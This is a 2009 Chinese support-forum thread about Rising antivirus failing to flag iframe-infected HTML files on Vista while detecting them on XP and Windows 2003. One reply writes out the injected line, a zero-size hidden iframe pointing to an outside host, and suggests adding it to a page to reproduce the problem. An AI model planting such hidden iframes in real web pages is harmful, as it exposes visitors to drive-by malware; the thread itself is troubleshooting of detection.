瑞星卡卡安全论坛个人产品讨论区瑞星杀毒软件瑞星杀毒软件2011 同一瑞星在不同电脑上对同样被挂马的HTML文件的杀毒结果不一样

12   2  /  2  页   跳转

[求助] 同一瑞星在不同电脑上对同样被挂马的HTML文件的杀毒结果不一样

回复 10F networkedition 的帖子

lz是如何判断vista哪台电脑是否中毒,如确认vista电脑和xp电脑都中毒,请查看vista电脑上的html文件是否和xp电脑上的一样,被写入恶意链接地址
--------------------------------------------
肯定是这样判断了我才来发贴的啥

再明确一下,同样的HTML文件,多个,里面都被写入了挂马的iframe,复制到vista和xp下(今天又试了在win2003里),在vista里没有查出来这几个文件被挂马,而xp和win2003里就查出来了,都是一样最新版的瑞星
gototop
 

回复 9F jks_风 的帖子

不知是特征码吧,还有内存查杀的,这就奇怪了?

oh,HTML文件。。。汗,你试试打开下不就知道了么。。。

我无语。。。
---------------------------------
就是打开看了才知道的啥,不然我咋知道vista下瑞星没有查出来毒呢?
gototop
 

回复:同一瑞星在不同电脑上对同样被挂马的HTML文件的杀毒结果不一样

自己顶一下,等瑞星升级
gototop
 

回复 13F 不能飚车 的帖子

发个vista下查杀不报的截图,和xp下查杀同一文件报毒的截图,还有把文件也一并打包发送上来。
ps:病毒库的版本都一样吧?

详细的操作系统类型,瑞星杀毒软件版本。
gototop
 

回复:同一瑞星在不同电脑上对同样被挂马的HTML文件的杀毒结果不一样

该用户帖子内容已被屏蔽
gototop
 

回复: 同一瑞星在不同电脑上对同样被挂马的HTML文件的杀毒结果不一样



引用:
原帖由 networkedition 于 2009-12-25 15:25:00 发表
发个vista下查杀不报的截图,和xp下查杀同一文件报毒的截图,还有把文件也一并打包发送上来。
ps:病毒库的版本都一样吧?

详细的操作系统类型,瑞星杀毒软件版本。



很简单,你可以自己建一个HTML文件,或者网上随便找一个网页保存下来,然后用文本编辑器打开,增加一行
<IFRAME SRC="http://rrr.rfhwfhw.com/1.htm" WIDTH=0 HEIGHT=0></IFRAME>
然后用瑞星看能否杀毒啥~~~
如果能杀,瑞星会把这行改为
<IFRAME WIDTH=0 HEIGHT=0></IFRAME>
并且报有病毒
gototop
 

回复 16F 不能飚车 的帖子

如果http://rrr.rfhwfhw.com/1.htm这个链接地址是恶意的,瑞星杀毒软件肯定会报毒呀,并会清除掉这个链接地址呀。需要提供相关文件来分析,为什么vista下不报毒,而xp下报毒并可以清除。
gototop
 
12   2  /  2  页   跳转
页面顶部
Powered by Discuz!NT